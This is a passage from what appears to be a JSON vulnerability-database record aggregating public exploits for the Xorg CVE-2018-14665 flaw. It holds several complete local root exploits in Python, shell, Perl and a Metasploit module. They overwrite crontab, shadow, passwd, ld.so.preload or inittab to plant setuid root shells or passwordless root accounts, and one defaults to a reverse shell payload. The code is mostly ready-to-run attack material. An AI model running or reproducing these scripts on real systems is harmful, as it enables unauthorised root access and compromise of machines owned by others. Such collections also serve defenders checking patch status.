str.splitlines(console)\r\n return consoleList\r\n \r\ndef payload():\r\n f = open(\"/tmp/payload\", \"w\")\r\n payload = (\"cp /bin/sh /usr/local/bin/shell\\n\"\r\n \"echo \\\"#include <stdio.h> \\\" > /tmp/shell.c\\n\"\r\n \"echo \\\"#include <stdlib.h>\\\" >> /tmp/shell.c\\n\"\r\n \"echo \\\"#include <sys/types.h>\\\" >> /tmp/shell.c\\n\"\r\n \"echo \\\"#include <unistd.h>\\\" >> /tmp/shell.c\\n\"\r\n \"echo 'int main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}' >> /tmp/shell.c\\n\"\r\n \"gcc /tmp/shell.c -o /usr/local/bin/shell\\n\"\r\n \"chmod 4777 /usr/local/bin/shell\\n\")\r\n f.write(payload) \r\n \r\ndef executePayload(): \r\n os.system(\"chmod +x /tmp/payload\")\r\n os.system(\"cd /etc; Xorg -fp \\\"* * * * * root /tmp/payload\\\" -logfile crontab :1 &\")\r\n print \"[*] crontab overwritten\"\r\n os.system(\"sleep 5\")\r\n os.system(\"pkill Xorg\")\r\n print \"[*] Xorg killed\"\r\n os.system(\"sleep 120\")\r\n return\r\n \r\ndef main():\r\n whoami = getWhoami()\r\n print \"[*] Waiting for \" + whoami + \" to connect to the console\"\r\n i = 0\r\n while (i == 0):\r\n consoleList = getConsole(path)\r\n for user in consoleList:\r\n if user == whoami :\r\n print \"[*] OK --> \" + user + \" console opened\"\r\n i = 1\r\n print \"[*] Building root shell wait 2 minutes\"\r\n payload()\r\n executePayload()\r\n print \"[*] Don't forget to cleanup /etc/crontab and /tmp dir\"\r\n os.system(\"/usr/local/bin/shell\") \r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-11-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31593"}, {"lastseen": "2018-10-31T00:40:02", "description": "Exploit for multiple platform in category local exploits", "edition": 1, "published": "2018-10-30T00:00:00", "title": "xorg #x11 #server 1.20.3 - Privilege Escalation Exploit (3)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-30T00:00:00", "id": "1337DAY-ID-31466", "href": "https://0day.today/exploit/description/31466", "sourceData": "# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation\r\n# Exploit Author: Marco Ivaldi\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: xorg-x11-server 1.19.0 - 1.20.2\r\n# Tested on: OpenBSD 6.3 and 6.4\r\n# CVE : CVE-2018-14665\r\n \r\n# raptor_xorgasm\r\n \r\n#!/bin/sh\r\n \r\n#\r\n# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\r\n# Copyright (c) 2018 Marco Ivaldi <[email\u00a0protected]>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# This exploit targets OpenBSD's cron in order to escalate privileges to\r\n# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical\r\n# console, it works perfectly on pseudo-terminals connected via SSH as well.\r\n#\r\n# See also:\r\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\r\n# https://www.exploit-db.com/exploits/45697/\r\n# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850\r\n#\r\n# Usage:\r\n# blobfish$ chmod +x raptor_xorgasm\r\n# blobfish$ ./raptor_xorgasm\r\n# [...]\r\n# Be patient for a couple of minutes...\r\n# [...]\r\n# Don't forget to cleanup and run crontab -e to reload the crontab.\r\n# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab\r\n# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned\r\n# blobfish# id\r\n# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# OpenBSD 6.4 (Xorg 1.19.6) [tested]\r\n# OpenBSD 6.3 (Xorg 1.19.6) [tested]\r\n#\r\n \r\necho \"raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <[email\u00a0protected]>\"\r\n \r\n# prepare the payload\r\ncat << EOF > /tmp/xorgasm\r\ncp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available\r\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c\r\ngcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid\r\nchmod 4777 /usr/local/bin/pwned\r\nEOF\r\nchmod +x /tmp/xorgasm\r\n \r\n# trigger the bug\r\ncd /etc\r\nXorg -fp \"* * * * * root /tmp/xorgasm\" -logfile crontab :1 &\r\nsleep 5\r\npkill Xorg\r\n \r\n# run the setuid shell\r\necho\r\necho \"Be patient for a couple of minutes...\"\r\necho\r\nsleep 120\r\necho\r\necho \"Don't forget to cleanup and run crontab -e to reload the crontab.\"\r\nls -l /etc/crontab*\r\nls -l /usr/local/bin/pwned\r\n/usr/local/bin/pwned\n\n# 0day.today [2018-10-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31466"}, {"lastseen": "2019-12-04T23:55:26", "description": "This Metasploit module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.", "edition": 1, "published": "2019-11-14T00:00:00", "title": "Xorg X11 Server Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-11-14T00:00:00", "id": "1337DAY-ID-33531", "href": "https://0day.today/exploit/description/33531", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server Local Privilege Escalation',\r\n 'Description' => %q(\r\n WARNING: Successful execution of this module results in /etc/passwd being overwritten.\r\n\r\n This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.\r\n Due to permission restrictions of the crontab in AIX, this module does not use cron,\r\n and instead overwrites /etc/passwd in order to create a new user with root privileges.\r\n All currently logged in users need to be included when /etc/passwd is overwritten,\r\n else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\r\n The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\r\n and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when\r\n overwriting /etc/passwd.\r\n ),\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and original FreeBSD exploit\r\n 'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'Notes' =>\r\n {\r\n 'SideEffects' => [ CONFIG_CHANGES ]\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2018-14665'],\r\n ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],\r\n ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],\r\n ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],\r\n ['EDB', '45938']\r\n ],\r\n 'Platform' => ['unix'],\r\n 'Arch' => [ARCH_CMD],\r\n 'SessionTypes' => ['shell'],\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'perl'\r\n }\r\n },\r\n 'DefaultOptions' => {\r\n 'Payload' => 'cmd/unix/reverse_perl'\r\n },\r\n 'Targets' =>\r\n [\r\n ['IBM AIX Version 6.1', {}],\r\n ['IBM AIX Version 7.1', {}],\r\n ['IBM AIX Version 7.2', {}]\r\n ],\r\n 'DefaultTarget' => 1))\r\n\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n xorg_path = cmd_exec('command -v Xorg')\r\n if !xorg_path.include?('Xorg')\r\n print_error('Could not find Xorg executable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n ksh93_path = cmd_exec('command -v ksh93')\r\n if !ksh93_path.include?('ksh')\r\n print_error('Could not find Ksh93 executable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if !xorg_vulnerable?\r\n print_error('Xorg version is not vulnerable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n status = check\r\n\r\n if status == Exploit::CheckCode::Safe\r\n fail_with(Failure::NotVulnerable, '')\r\n end\r\n\r\n if !writable?(datastore['WritableDir'])\r\n fail_with(Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\")\r\n end\r\n\r\n xorg_path = cmd_exec('command -v Xorg')\r\n ksh93_path = cmd_exec('command -v ksh93')\r\n\r\n xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])\r\n xorg_script_path = \"#{datastore['WritableDir']}/wow.ksh\"\r\n upload_and_chmodx(xorg_script_path, xorg_payload)\r\n\r\n passwd_backup = \"#{datastore['WritableDir']}/passwd.backup\"\r\n print_status(\"Backing up /etc/passwd to #{passwd_backup}\")\r\n cmd_exec(\"cp /etc/passwd #{passwd_backup}\")\r\n register_file_for_cleanup(passwd_backup)\r\n\r\n print_status(\"Executing #{xorg_script_path}\")\r\n cmd_exec(xorg_script_path)\r\n print_status('Checking if we are root')\r\n\r\n if root?\r\n shell_payload = %(#!#{ksh93_path}\r\n#{payload.encoded}\r\n)\r\n shell_script_path = \"#{datastore['WritableDir']}/wowee.ksh\"\r\n upload_and_chmodx(shell_script_path, shell_payload)\r\n\r\n print_status('Executing shell payload')\r\n cmd_exec(\"#{ksh93_path} -c \\\"echo #{shell_script_path} | su - wow &\\\"\")\r\n\r\n print_status('Restoring original /etc/passwd')\r\n cmd_exec(\"su - wow -c \\\"cp #{passwd_backup} /etc/passwd\\\"\")\r\n else\r\n fail_with(Failure::PayloadFailed, '')\r\n end\r\n end\r\n\r\n def generate_xorg_payload(xorg_path, ksh93_path, writabledir)\r\n passwd_file = read_file('/etc/passwd')\r\n passwd_array = passwd_file.split(\"\\n\")\r\n\r\n print_status('Retrieving currently logged in users')\r\n users = cmd_exec('who | cut -d\\' \\' -f1 | sort | uniq')\r\n users << \"\\n\"\r\n users_array = users.split(\"\\n\")\r\n\r\n logged_in_users = ''\r\n if !users_array.empty?\r\n users_array.each do |user|\r\n user << ':'\r\n passwd_array.each do |line|\r\n if line.index(user) == 0\r\n logged_in_users << '\\n'\r\n logged_in_users << line\r\n end\r\n end\r\n end\r\n end\r\n\r\n passwd_data = \"$'#{logged_in_users}\\\\nwow::0:0::/:/usr/bin/ksh\\\\n#'\"\r\n\r\n subdir_count = writabledir.count('/')\r\n relative_passwd = '../' * subdir_count + '../../etc/passwd'\r\n\r\n return %(#!#{ksh93_path}\r\n #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1\r\n)\r\n end\r\n\r\n def xorg_vulnerable?\r\n version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \\'{ print $2 }\\'')\r\n print_status(\"Xorg version is #{version}\")\r\n semantic_version = Gem::Version.new(version)\r\n\r\n vulnerable_versions = [\r\n ['6.1.9.0', '6.1.9.100'],\r\n ['7.1.4.0', '7.1.4.30'],\r\n ['7.1.5.0', '7.1.5.31'],\r\n ['7.2.0.0', '7.2.0.1'],\r\n ['7.2.1.0', '7.2.1.0'],\r\n ['7.2.2.0', '7.2.2.0'],\r\n ['7.2.3.0', '7.2.3.15']\r\n ]\r\n\r\n vulnerable_versions.each do |version_pair|\r\n if semantic_version >= Gem::Version.new(version_pair[0]) &&\r\n semantic_version <= Gem::Version.new(version_pair[1])\r\n return true\r\n end\r\n end\r\n\r\n return false\r\n end\r\n\r\n def root?\r\n id_output = cmd_exec('su - wow -c \"id\"')\r\n\r\n if id_output.include?('euid=0') || id_output.include?('uid=0')\r\n print_good('Got root!')\r\n return true\r\n end\r\n\r\n print_error('Not root')\r\n false\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n print_status(\"Writing to #{path}\")\r\n rm_f(path)\r\n write_file(path, data)\r\n cmd_exec(\"chmod 0555 '#{path}'\")\r\n\r\n register_file_for_cleanup(path)\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33531"}, {"lastseen": "2018-10-26T20:41:47", "description": "Exploit for multiple platform in category local exploits", "edition": 1, "published": "2018-10-26T00:00:00", "title": "xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit (2)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-26T00:00:00", "id": "1337DAY-ID-31437", "href": "https://0day.today/exploit/description/31437", "sourceData": "xorg-x11-server Local Privilege Escalation (2)\r\n\r\n#!/bin/bash\r\n# x0rg - Xorg Local Root Exploit\r\n# Released under the Snitches Get Stitches Public Licence.\r\n# props to prdelka / fantastic for the shadow vector. \r\n# Gr33tz to everyone in #lizardhq and elsewhere <3\r\n# ~infodox (25/10/2018)\r\n# FREE LAURI LOVE!\r\necho \"x0rg\"\r\necho \"[+] First, we create our shell and library...\"\r\ncat << EOF > /tmp/libhax.c\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\n__attribute__ ((__constructor__))\r\nvoid dropshell(void){\r\n chown(\"/tmp/rootshell\", 0, 0);\r\n chmod(\"/tmp/rootshell\", 04755);\r\n unlink(\"/etc/ld.so.preload\");\r\n printf(\"[+] done!\\n\");\r\n}\r\nEOF\r\ngcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c\r\nrm -f /tmp/libhax.c\r\ncat << EOF > /tmp/rootshell.c\r\n#include <stdio.h>\r\nint main(void){\r\n setuid(0);\r\n setgid(0);\r\n seteuid(0);\r\n setegid(0);\r\n execvp(\"/bin/sh\", NULL, NULL);\r\n}\r\nEOF\r\ngcc -o /tmp/rootshell /tmp/rootshell.c\r\nrm -f /tmp/rootshell.c\r\necho \"[+] Hack the planet!\"\r\ncd /etc; Xorg -fp \"/tmp/libhax.so\" -logfile ld.so.preload :1;\r\nmount # arbritary setuid we run to pop root\r\necho \"[+] Tidy up a bit...\"\r\nrm -f /tmp/libhax.so\r\necho \"[<3] :PPpPpPpOpr000000t!\"\r\n/tmp/rootshell\n\n# 0day.today [2018-10-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31437"}], "exploitpack": [{"lastseen": "2020-04-01T19:06:10", "description": "\nxorg-x11-server 1.20.3 - Local Privilege Escalation", "edition": 1, "published": "2018-10-25T00:00:00", "title": "xorg-x11-server 1.20.3 - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-25T00:00:00", "id": "EXPLOITPACK:ADC2F0547F06456887993FC83AC31CB3", "href": "", "sourceData": "#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet\n\ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su\n\nOverwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.\n\n\n\n\n\n#!/bin/sh\n# local privilege escalation in X11 currently\n# unpatched in OpenBSD 6.4 stable - exploit\n# uses cve-2018-14665 to overwrite files as root. \n# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid\n# and vulnerable in default OpenBSD.\n#\n# - https://hacker.house\necho [+] OpenBSD 6.4-stable local root exploit\ncd /etc\nXorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &\nsleep 5\npkill Xorg\necho [-] dont forget to mv and chmod /etc/master.passwd.old back \necho [+] type 'Password1' and hit enter for root\nsu -\n\n\nEBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:06:10", "description": "\nxorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation", "edition": 1, "published": "2019-01-14T00:00:00", "title": "xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-14T00:00:00", "id": "EXPLOITPACK:6CADE2C9086A89E6055B6A71CB230062", "href": "", "sourceData": "#!/bin/sh\n\n# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)\n# Date: 2018-11-25\n# Exploit Author: Marco Ivaldi\n# Vendor Homepage: https://www.x.org/\n# Version: xorg-x11-server 1.19.0 - 1.20.2\n# Tested on: Oracle Solaris 11.4\n# CVE : CVE-2018-14665\n\n#\n# raptor_solgasm - xorg-x11-server LPE via Solaris inittab\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665).\n#\n# \"In video games, this is what they call respawning\" -- Nick Sax\n#\n# This exploit targets /etc/inittab in order to escalate privileges to root\n# on Solaris 11 (no need to be connected to a physical console). Messing with \n# inittab is considerably dangerous and you may trash your system, however the\n# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't \n# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!\n#\n# See also:\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\n#\n# Usage:\n# raptor@stalker:~$ chmod +x raptor_solgasm\n# raptor@stalker:~$ ./raptor_solgasm\n# [...]\n# Now please be patient for a few minutes...\n# [...]\n# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab\n# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab\n# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old\n# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned\n# root@stalker:/etc# id\n# uid=0(root) gid=0(root)\n#\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\n# Oracle Solaris 11 SPARC [untested]\n#\n\necho \"raptor_solgasm - xorg-x11-server LPE via Solaris inittab\"\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\n\n# prepare the payload\ncat << EOF > /tmp/solgasm\ncp /bin/zsh /tmp/pwned # fallback in case gcc is not available\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/bash\\\");}\" > /tmp/pwned.c\ngcc /tmp/pwned.c -o /tmp/pwned\nchmod 4777 /tmp/pwned\nEOF\nchmod +x /tmp/solgasm\n\n# trigger the bug\nPWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)\ncd /etc\nXorg -fp \"${PWN}::respawn:/tmp/solgasm\" -logfile inittab :1 &\nsleep 5\npkill Xorg\n\n# run the setuid shell\necho\necho \"Now please be patient for a few minutes...\"\necho\nuntil [ -u /tmp/pwned ]; do sleep 1; done\necho \"To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab\"\nls -l /etc/inittab*\nls -l /tmp/pwned\nsleep 1\n/tmp/pwned", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:06:10", "description": "\nxorg-x11-server 1.20.1 - Local Privilege Escalation", "edition": 1, "published": "2018-11-13T00:00:00", "title": "xorg-x11-server 1.20.1 - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-13T00:00:00", "id": "EXPLOITPACK:CE863F6931CD376B67EB8A13F5A7E4E2", "href": "", "sourceData": "# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)\n# Date: 2018-11-07\n# Exploit Author: @bolonobolo\n# Vendor Homepage: https://www.x.org/\n# Version: 1.19.5\n# Tested on: RHEL 7.3 && 7.5\n# CVE : CVE-2018-14665\n# Explanation\n# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user \n# has to be logged in trought console at the moment the PE script launched.\n# In fact during the logged in session of the legitimate non-root user, \n# a file with the name of the non-root user will be created in the /var/run/console folder. \n# With that file present, the same non-root user can launch a Xorg command via SSH. \n# \n# Usage: $ python poc.py\n# $ python poc.py \n# [*] Waiting for bolo to connect to the console\n# [*] OK --> bolo console opened\n# [*] Building root shell wait 2 minutes\n# [*] crontab overwritten\n# \n# ... cut Xorg output ...\n# \n# [*] Xorg killed\n# (II) Server terminated successfully (0). Closing log file.\n# [*] Don't forget to cleanup /etc/crontab and /tmp dir\n# sh-4.2# id && whoami\n# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)\n# root\n# sh-4.2#\n\n\n#!/usr/bin/python\nimport os\nimport getpass\nimport subprocess\n\nuserList = []\npath=\"/var/run/console/\"\n\ndef getWhoami():\n\treturn getpass.getuser()\n\ndef getConsole(path):\n\tp = subprocess.Popen([\"ls\", path], stdout=subprocess.PIPE)\n\t(console, err) = p.communicate()\n\tconsoleList = str.splitlines(console)\n\treturn consoleList\n\ndef payload():\n\tf = open(\"/tmp/payload\", \"w\")\n\tpayload = (\"cp /bin/sh /usr/local/bin/shell\\n\" \n\t\t\t\"echo \\\"#include <stdio.h> \\\" > /tmp/shell.c\\n\"\n \t\t\t\"echo \\\"#include <stdlib.h>\\\" >> /tmp/shell.c\\n\"\n \t\t\t\"echo \\\"#include <sys/types.h>\\\" >> /tmp/shell.c\\n\"\n \t\t\t\"echo \\\"#include <unistd.h>\\\" >> /tmp/shell.c\\n\"\n\t\t\t\"echo 'int main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}' >> /tmp/shell.c\\n\"\n\t\t\t\"gcc /tmp/shell.c -o /usr/local/bin/shell\\n\"\n\t\t\t\"chmod 4777 /usr/local/bin/shell\\n\")\n\tf.write(payload)\t\n\t\ndef executePayload():\t\n\tos.system(\"chmod +x /tmp/payload\")\n\tos.system(\"cd /etc; Xorg -fp \\\"* * * * * root /tmp/payload\\\" -logfile crontab :1 &\")\n\tprint \"[*] crontab overwritten\"\n\tos.system(\"sleep 5\")\n\tos.system(\"pkill Xorg\")\n\tprint \"[*] Xorg killed\"\n\tos.system(\"sleep 120\")\n\treturn\n\ndef main():\n\twhoami = getWhoami()\n\tprint \"[*] Waiting for \" + whoami + \" to connect to the console\"\n\ti = 0\n\twhile (i == 0):\n\t\tconsoleList = getConsole(path)\n\t\tfor user in consoleList:\n\t\t\tif user == whoami :\n\t\t\t\tprint \"[*] OK --> \" + user + \" console opened\"\n\t\t\t\ti = 1\n\tprint \"[*] Building root shell wait 2 minutes\"\n\tpayload()\n\texecutePayload()\n\tprint \"[*] Don't forget to cleanup /etc/crontab and /tmp dir\"\n\tos.system(\"/usr/local/bin/shell\")\t\t\t\n\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:05:28", "description": "\nXorg X11 Server (AIX) - Local Privilege Escalation", "edition": 1, "published": "2018-12-04T00:00:00", "title": "Xorg X11 Server (AIX) - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-12-04T00:00:00", "id": "EXPLOITPACK:4939A42DDD3D9DDC0BB267A685A819B9", "href": "", "sourceData": "# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation\n# Date: 29/11/2018\n# Exploit Author: @0xdono\n# Original Discovery and Exploit: Narendra Shinde\n# Vendor Homepage: https://www.x.org/\n# Platform: AIX\n# Version: X Window System Version 7.1.1\n# Fileset: X11.base.rte < 7.1.5.32\n# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)\n# CVE: CVE-2018-14665\n#\n# Explanation:\n# Incorrect command-line parameter validation in the Xorg X server can\n# lead to privilege elevation and/or arbitrary files overwrite, when the\n# X server is running with elevated privileges.\n# The -logfile argument can be used to overwrite arbitrary files in the\n# file system, due to incorrect checks in the parsing of the option.\n#\n# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.\n# It overwrites /etc/passwd in order to create a new user with root privileges. \n# All currently logged in users need to be included when /etc/passwd is overwritten,\n# else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\n# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\n# and is replaced by '-config'.\n# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.\n#\n# IBM has not yet released a patch as of 29/11/2018.\n#\n# See also:\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\n# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html\n# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl\n#\n# Usage:\n# $ oslevel -s\n# 7100-04-00-0000\n# $ Xorg -version\n# \n# X Window System Version 7.1.1\n# Release Date: 12 May 2006\n# X Protocol Version 11, Revision 0, Release 7.1.1\n# Build Operating System: AIX IBM\n# Current Operating System: AIX sovma470 1 7 00C3C6F54C00\n# Build Date: 07 July 2006\n# Before reporting problems, check http://wiki.x.org\n# to make sure that you have the latest version.\n# Module Loader present\n# $ id\n# uid=16500(nmyo) gid=1(staff)\n# $ perl aixxorg.pl\n# [+] AIX X11 server local root exploit\n# [-] Checking for Xorg and ksh93 \n# [-] Opening /etc/passwd \n# [-] Retrieving currently logged in users \n# [-] Generating Xorg command \n# [-] Opening /tmp/wow.ksh \n# [-] Writing Xorg command to /tmp/wow.ksh \n# [-] Backing up /etc/passwd to /tmp/passwd.backup \n# [-] Making /tmp/wow.ksh executable \n# [-] Executing /tmp/wow.ksh \n# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n# [-] Done \n# [+] 'su wow' for root shell \n# $ su wow\n# # id\n# uid=0(root) gid=0(system)\n# # whoami\n# root\n\n#!/usr/bin/perl\nprint \"[+] AIX X11 server local root exploit\\n\";\n\n# Check Xorg is in path\nprint \"[-] Checking for Xorg and ksh93 \\n\";\nchomp($xorg = `command -v Xorg`);\nif ($xorg eq \"\"){ \n print \"[X] Can't find Xorg binary, try hardcode it? exiting... \\n\";\n exit;\n}\n\n# Check ksh93 is in path\nchomp($ksh = `command -v ksh93`);\nif ($ksh eq \"\"){\n print \"[X] Can't find ksh93 binary, try hardcode it? exiting... \\n\";\n exit;\n}\n\n# Read in /etc/passwd\nprint \"[-] Opening /etc/passwd \\n\";\nopen($passwd_fh, '<', \"/etc/passwd\");\nchomp(@passwd_array = <$passwd_fh>);\nclose($passwd_fh);\n\n# Retrieve currently logged in users\nprint \"[-] Retrieving currently logged in users \\n\";\n@users = `who | cut -d' ' -f1 | sort | uniq`;\nchomp(@users);\n\n# For all logged in users, add their current passwd entry to string\n# that will be used to overwrite passwd\n$users_logged_in_passwd = '';\nforeach my $user (@users)\n{\n $user .= \":\";\n foreach my $line (@passwd_array)\n {\n if (index($line, $user) == 0) {\n $users_logged_in_passwd = $users_logged_in_passwd . '\\n' . $line;\n }\n }\n}\n\n# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log\nprint \"[-] Generating Xorg command \\n\";\n$blob = '-config ' . '$\\'' . $users_logged_in_passwd . '\\nwow::0:0::/:/usr/bin/ksh\\n#' . '\\'';\n\nprint \"[-] Opening /tmp/wow.ksh \\n\";\t\t\nopen($fr, '>', \"/tmp/wow.ksh\");\n\n# Use ksh93 for ANSI-C quoting\nprint \"[-] Writing Xorg command to /tmp/wow.ksh \\n\";\nprint $fr '#!' . \"$ksh\\n\";\nprint $fr \"$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \\n\";\nclose $fr;\n\n# Backup passwd \nprint \"[-] Backing up /etc/passwd to /tmp/passwd.backup \\n\";\nsystem(\"cp /etc/passwd /tmp/passwd.backup\");\n\n# Make script executable and run it\nprint \"[-] Making /tmp/wow.ksh executable \\n\";\nsystem(\"chmod +x /tmp/wow.ksh\");\nprint \"[-] Executing /tmp/wow.ksh \\n\";\nsystem(\"/tmp/wow.ksh\");\n\n# Replace overwritten passwd with: original passwd + wow user\nprint \"[-] 